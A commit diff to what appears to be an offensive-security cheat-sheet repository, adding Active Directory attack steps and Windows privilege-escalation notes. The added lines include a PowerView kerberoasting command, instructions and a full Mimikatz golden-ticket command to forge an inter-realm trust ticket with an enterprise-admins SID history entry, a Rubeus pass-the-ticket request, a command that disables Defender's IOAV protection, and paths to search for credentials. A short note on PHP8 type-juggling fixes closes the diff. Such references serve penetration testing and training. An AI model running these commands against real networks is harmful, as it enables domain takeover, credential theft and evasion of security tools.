AMSI + Trust

Methodology and Resources/Active Directory Attack.md

@@ -1098,6 +1098,12 @@ Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
 .\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD /outfile:hash.txt
 ```
 
+Alternatively with [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
+
+```powershell
+Request-SPNTicket -SPN "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
+```
+
 Alternatively on macOS machine you can use [bifrost](https://github.com/its-a-feature/bifrost)
 
 ```powershell
@@ -1605,6 +1611,9 @@ Prerequisite:
 
 ### Forest to Forest Compromise - Trust Ticket
 
+From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using 
+Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**.
+
 #### Dumping trust passwords (trust keys)
 
 > Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing “$” are computer accounts, but some are trust accounts.
@@ -1619,12 +1628,14 @@ or find the TRUST_NAME$ machine account hash
 
 ```powershell
 mimikatz(commandline) # kerberos::golden /domain:domain.local /sid:S-1-5-21... /rc4:HASH_TRUST$ /user:Administrator /service:krbtgt /target:external.com /ticket:c:\temp\trust.kirbi
+mimikatz(commandline) # kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:e4e47c8fc433c9e0f3b17ea74856ca6b /user:Administrator /service:krbtgt /target:moneycorp.local /ticket:c:\ad\tools\mcorp-ticket.kirbi
 ```
 
 #### Use the Trust Ticket file to get a TGS for the targeted service
 
 ```powershell
-./asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
+.\asktgs.exe c:\temp\trust.kirbi CIFS/machine.domain.local
+.\Rubeus.exe asktgs /ticket:c:\ad\tools\mcorp-ticket.kirbi /service:LDAP/mcorp-dc.moneycorp.local /dc:mcorp-dc.moneycorp.local /ptt
 ```
 
 Inject the TGS file and access the targeted service with the spoofed rights.

Methodology and Resources/Windows - Privilege Escalation.md

@@ -249,6 +249,7 @@ PS C:\> Get-MpComputerStatus
 
 # disable Real Time Monitoring
 PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
+PS C:\> Set-MpPreference -DisableIOAVProtection $true
 ```
 
 ### AppLocker Enumeration
@@ -426,6 +427,8 @@ C:\inetpub\wwwroot\web.config
 %USERPROFILE%\ntuser.dat
 %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
 %WINDIR%\System32\drivers\etc\hosts
+C:\ProgramData\Configs\*
+C:\Program Files\Windows PowerShell\*
 dir c:*vnc.ini /s /b
 dir c:*ultravnc.ini /s /b
 ```

Type Juggling/README.md

@@ -7,6 +7,8 @@ PHP provides two ways to compare two variables:
 
 PHP type juggling vulnerabilities arise when loose comparison (== or !=) is employed instead of strict comparison (=== or !==) in an area where the attacker can control one of the variables being compared. This vulnerability can result in the application returning an unintended answer to the true or false statement, and can lead to severe authorization and/or authentication bugs.
 
+> PHP8 won't try to cast string into numbers anymore, thanks to the Saner string to number comparisons RFC, meaning that collision with hashes starting with 0e and the likes are finally a thing of the past! The Consistent type errors for internal functions RFC will prevent things like `0 == strcmp($_GET['username'], $password)` bypasses, since strcmp won't return null and spit a warning any longer, but will throw a proper exception instead. 
+
 ## Type Juggling
 
 ### True statements